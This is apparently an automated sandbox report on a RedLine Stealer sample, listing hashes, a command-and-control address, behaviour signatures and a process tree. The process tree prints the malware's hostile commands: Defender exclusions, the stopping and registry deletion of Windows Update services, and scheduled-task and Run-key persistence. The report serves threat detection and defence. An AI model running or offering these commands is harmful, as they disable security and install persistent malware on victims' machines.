Analysis
- max time kernel: 150s
- max time network: 102s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30/01/2023, 19:02
- Static task: static1
- Behavioral task: behavioral1
  - Sample: b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
  - Resource: win7-20220901-en
- Behavioral task: behavioral2
  - Sample: b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
  - Resource: win10v2004-20220812-en

General
- Target: b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
- Size: 360KB
- MD5: 9c0c75bb31dfa46b2c91c12693bf45dd
- SHA1: b405694fbedc3ed57f486a0bd892fb48b2917d49
- SHA256: c332e200a4050d2b0e7cb33ddbed8e8cd6caff60653cb30a1f76bec08031cbbe
- SHA512: cc666cfd32f070b859bdfcb5391fe160a7456c00426e806736a459044205558a579d45092eedaf31a90a90ccd0957948bccce248bbc5cdcef7f5885f44e37b44
- SSDEEP: 6144:FUzcknZ/qA5koqdrF7ENQ8zxT8iz5ZhHS7gVFy6d3bBum+WOmekGAOIA40e8aHc:FUwg/qA5Zz28zxT8yZZSUVFV14kG+0e2

Malware Config
Extracted
- family: redline
- redline (config 1): 107.182.129.73:21733
- auth_value: 3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload 1 IoCs
resource | yara_rule
behavioral2/memory/4232-167-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 3204 created 4264 | 3204 | WerFault.exe | 59
PID 2832 created 3384 | 2832 | WerFault.exe | 41
PID 4168 created 3744 | 4168 | WerFault.exe | 132
PID 1116 created 5080 | 1116 | WerFault.exe | 135

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description | pid | Process | procid_target
PID 4696 created 2644 | 4696 | SmartDefRun.exe | 38
PID 4696 created 2644 | 4696 | SmartDefRun.exe | 38
PID 4696 created 2644 | 4696 | SmartDefRun.exe | 38
PID 4696 created 2644 | 4696 | SmartDefRun.exe | 38
PID 176 created 620 | 176 | powershell.EXE | 3
PID 5008 created 3384 | 5008 | svchost.exe | 41
PID 5008 created 4264 | 5008 | svchost.exe | 59
PID 5008 created 3744 | 5008 | svchost.exe | 132
PID 5008 created 5080 | 5008 | svchost.exe | 135

Blocklisted process makes network request 1 IoCs
flow | pid | Process
17 | 1748 | powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe

Executes dropped EXE 5 IoCs
pid | Process
940 | new2.exe
4780 | C4Loader.exe
4696 | SmartDefRun.exe
1416 | SysApp.exe
2072 | fodhelper.exe

Stops running service(s) 3 TTPs

Uses the VBS compiler for execution 1 TTPs

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Drops file in System32 directory 10 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | svchost.exe

Suspicious use of SetThreadContext 4 IoCs
description | pid | Process | procid_target
PID 2472 set thread context of 2864 | 2472 | b405694fbedc3ed57f486a0bd892fb48b2917d49.exe | 80
PID 940 set thread context of 4232 | 940 | new2.exe | 93
PID 4696 set thread context of 4788 | 4696 | SmartDefRun.exe | 119
PID 176 set thread context of 3504 | 176 | powershell.EXE | 124

Drops file in Program Files directory 1 IoCs
description | ioc | Process
File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4908 | sc.exe
2448 | sc.exe
3040 | sc.exe
4596 | sc.exe
4728 | sc.exe

Program crash 6 IoCs
pid | pid_target | Process | procid_target
3400 | 2472 | WerFault.exe | 78
1768 | 940 | WerFault.exe | 89
1496 | 3384 | WerFault.exe | 41
2676 | 4264 | WerFault.exe | 59
4240 | 3744 | WerFault.exe | 132
5104 | 5080 | WerFault.exe | 135

Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3728 | schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe

Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2644 | Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
- C:\Windows\system32\winlogon.exe (command line: winlogon.exe; level 1; PID 620)
  - C:\Windows\system32\dwm.exe (command line: "dwm.exe"; level 2; PID 1016)
  - C:\Windows\System32\dllhost.exe (command line: C:\Windows\System32\dllhost.exe /Processid:{deb96dc5-bd3c-4c34-b0a7-abe76dc04500}; level 2; PID 3504)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
- C:\Windows\system32\lsass.exe (command line: C:\Windows\system32\lsass.exe; level 1; PID 672)
- C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc; level 1; PID 432)
- C:\Windows\system32\svchost.exe (command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule; level 1; PID 1152)
  - Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe (command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}; level 2; PID 2512)
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (level 2; the command line is a long obfuscated PowerShell script and is not reproduced here)
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - PID: 176
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (level 2; the command line is a long obfuscated PowerShell script and is not reproduced here)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:2072
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1384
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2388
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2696
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2588
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 2126⤵
- Program crash
PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4696
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1416 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:3728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3248
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 2683⤵
- Program crash
PID:3400
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4728
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1576
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4188
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3012
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1628
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4576
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3040
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4596
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4788
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3188
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3384
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3384 -s 1482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1496
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3552
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:2256
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5112
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4264
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4264 -s 8562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2676
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2472 -ip 24722⤵PID:1628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 940 -ip 9402⤵PID:1660
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 476 -p 4264 -ip 42642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3204
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3384 -ip 33842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2832
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3744 -ip 37442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4168
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 5080 -ip 50802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1116
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2556
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4496
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3744
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3744 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4240
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:5080
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5080 -s 7802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5104
-
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize 35KB
MD5 a5f9de1afb2ce09cd58dcd9fa0f07661
SHA1 f3a787dfae568bfb04c2c8890bb0b4453f1a93b9
SHA256 a2161e7af83264dfb9cef4b82835a86aac48df3e3d0cdba33f40016644b96f61
SHA512 5d7e5ec5d34ece0efe932fe16b893f097abd1bbac94c2333bd05571ed6e5d158a9649b1ab5094d35590f1e2e99f87168d693ffc1820306b44bfe6baa379d431e

Filesize 13KB
MD5 05425fb2df8812ebce2d115d83b4594a
SHA1 9f515a04713ebec7fdcfac4db85c7aeb8bfdc7b9
SHA256 38cc0a29023675f7212a4b0cee0ce226d44e8e111ca958204352f570fac811c8
SHA512 43e06f6aefb067f6e2de529719d1a91a4f3193857004e9f147d4259525942b0e933324c88cff9f20830a2c4d97183daffd174dca6b44a6b1a404dfac0c123249

Filesize 35KB
MD5 8ab4673392964d0e58f969e61a0bef89
SHA1 216ca63e6b3698e764704209a9fee6c5fee511f6
SHA256 4984063dd67898340cc85fd43af2ace7e8c6aebe07af299c258e0861f8df8739
SHA512 f31cbc85e31250599e7065e1d01c6d4cbd7366764c393dd7eb1d7acc87ed8ad2abe837bbadebdca771f6a722c1ec9f31585b52fa7c508819c8957287024be940

Filesize 13KB
MD5 808aac6e8b81c38135f0ad5532afa2c8
SHA1 054c74649970949ebaf0bfed37a28c313b82c381
SHA256 a6b6583520450c9d76e7cdaa82d6d802ebeda262f575072973d14cf1a66e9cfb
SHA512 38bb3860c375df85f140a72a4a1fe13adc0a13dbbd9bdae1fc78c3b4dc54c40eb9d0085f688a885f927521b0f6730b3db498a5275b4a1bfc2ac57a6f6c24db08

Filesize 37KB
MD5 7b5d9858a72c5f9f78f1239765efddcd
SHA1 c524292b3450092b7e736e7312a0a29a162d1192
SHA256 ab5f5fc0bc8c9fb99c442127c74d5228db9abbda2679f0268e532e18506391ef
SHA512 e813fa08f57c23f74c8169a3f3b5e731e601cdd5bbf0bdd370dc6e3bca6328bbb9dcdc2618a2335c518de4347a8dd93af833e2bd916cdd4d27b8d7fcdb14979b

Filesize 37KB
MD5 54c0da8d7bd1d6b252149cc322a9ef28
SHA1 cd01cd9163d718d0eb8627d3c50c284be5bdd32c
SHA256 c90de362ec9524d80426ca05c7be21960f24c5a58b51b83183e680ce5f8ceb4a
SHA512 5defd588a698d9d9437f3ff21dcf711d70e82ba5991a072c3d66f91b5a69d6c461002a1caa220a84f0fd4bdee330402e8f6b4d6b61c4025dbd3c00a5e41fbfab

Filesize 13KB
MD5 babcb89de9ad4130c05e1fbf3c04b2f3
SHA1 534822cc1c1a2f88d6dcfc6342a36521fb1886f2
SHA256 3bb115ae37cf1f4e1f8144fd1441cd8b35fc24ab4cfb71f8dec81159df65a268
SHA512 8c4ad28f5d84626b18de638d5c8957b3f61111e39151ffc4f9107e38e65bd2bc29548b303f8962bd3fbd39db98c9c6e05f59cc2091f44b11e3b7a2aaf0c1e4d3

Filesize 13KB
MD5 aa492c6b2468e34c2225ba82a91b6aac
SHA1 423636bbe335ec6b6255bbe18b8a00a4b84e69d7
